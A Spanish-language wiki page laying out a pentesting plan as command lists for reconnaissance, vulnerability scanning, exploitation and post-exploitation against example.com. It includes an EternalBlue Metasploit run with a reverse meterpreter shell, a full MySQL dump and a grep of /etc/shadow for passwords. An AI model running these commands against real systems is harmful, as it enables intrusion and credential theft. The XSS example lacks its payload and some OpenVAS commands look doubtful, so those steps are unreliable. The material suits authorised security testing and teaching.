====== Plan de pentesting ====== Plan exhaustivo de pentesting orientado a ser ejecutado en una máquina Linux en modo texto. Incluye una combinación de técnicas automatizadas y manuales para garantizar una evaluación de seguridad integral. ===== Fase de Reconocimiento ===== ==== Recopilación de Información Pasiva ==== === Whois Lookup === whois example.com **Objetivo**: Obtener información de registro del dominio. === Consulta DNS === dig example.com dig example.com MX dig example.com NS dig example.com ANY **Objetivo**: Obtener registros DNS asociados con el dominio. === Buscar Subdominios === sublist3r -d example.com **Objetivo**: Identificar subdominios relacionados con el dominio objetivo. === Buscar Metadatos en Documentos Públicos === exiftool document.pdf **Objetivo**: Extraer metadatos de archivos para obtener información sensible. ==== Recopilación de Información Activa ==== === Escaneo de Puertos === nmap -sS -sV -p- example.com **Objetivo**: Identificar puertos abiertos y servicios que se están ejecutando. === Enumeración de Servicios === nmap -sV -p [puertos] example.com **Objetivo**: Determinar versiones de servicios para detectar posibles vulnerabilidades. ===== Fase de Análisis de Vulnerabilidades ===== ==== Escaneo de Vulnerabilidades ==== === Nmap con Scripts NSE === nmap --script vuln -p [puertos] example.com **Objetivo**: Usar scripts NSE para identificar vulnerabilidades específicas. === Escaneo de Vulnerabilidades con OpenVAS === openvas-start openvas-check-setup openvas-scan-target example.com **Objetivo**: Utilizar OpenVAS para escanear vulnerabilidades conocidas. ==== Análisis de Vulnerabilidades Web ==== === Nikto === nikto -h example.com **Objetivo**: Identificar configuraciones inseguras y vulnerabilidades en servidores web. === Wpscan (para sitios WordPress) === wpscan --url example.com **Objetivo**: Identificar vulnerabilidades en sitios web que utilizan WordPress. === Gobuster === gobuster dir -u example.com -w /usr/share/wordlists/dirb/common.txt **Objetivo**: Fuerza bruta de directorios y archivos comunes en el servidor web. ===== Fase de Explotación ===== ==== Explotación de Servicios y Aplicaciones ==== === Metasploit Framework === msfconsole search [vulnerability] use exploit/[exploit_path] set RHOST example.com set RPORT [puerto] run **Objetivo**: Utilizar Metasploit para explotar vulnerabilidades conocidas. === Explotación Manual === * **Ejemplo de SQL Injection** sqlmap -u "http://example.com/vulnerable_page.php?id=1" --dbs **Objetivo**: Identificar y explotar inyecciones SQL. * **Ejemplo de XSS (Cross-Site Scripting)** curl "http://example.com/search.php?query=" **Objetivo**: Probar inyección de scripts maliciosos en campos de entrada. ==== Explotación de Redes ==== === Explotación de SMB (EternalBlue) === nmap --script smb-vuln* -p 445 example.com msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST example.com set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [tu_IP] run **Objetivo**: Explotar vulnerabilidades SMB conocidas (MS17-010). ===== Post-Explotación ===== ==== Elevación de Privilegios ==== === Búsqueda de SUID Binaries === find / -perm -u=s -type f 2>/dev/null **Objetivo**: Encontrar binarios SUID para posible elevación de privilegios. === Enumeración de Servicios y Cron Jobs === ps aux crontab -l **Objetivo**: Identificar posibles vectores para elevación de privilegios. ==== Extracción de Datos ==== === Dump de Bases de Datos === mysqldump -u root -p --all-databases > all_databases.sql **Objetivo**: Extraer bases de datos completas. === Extracción de Contraseñas en Texto Claro === grep -i "password" /etc/passwd /etc/shadow /var/www/html/config.php **Objetivo**: Buscar contraseñas almacenadas en texto claro en archivos de configuración. ===== Referencias de Documentación ===== * **Nmap NSE Documentation**: [[https://nmap.org/book/nse.html|Nmap Scripting Engine (NSE) Documentation]] * **Nikto Documentation**: [[https://cirt.net/nikto2|Nikto Documentation]] * **SQLMap Documentation**: [[http://sqlmap.org/|SQLMap Documentation]] * **Gobuster Documentation**: [[https://github.com/OJ/gobuster|Gobuster Documentation]] * **Metasploit Framework Documentation**: [[https://www.offensive-security.com/metasploit-unleashed/|Metasploit Unleashed]]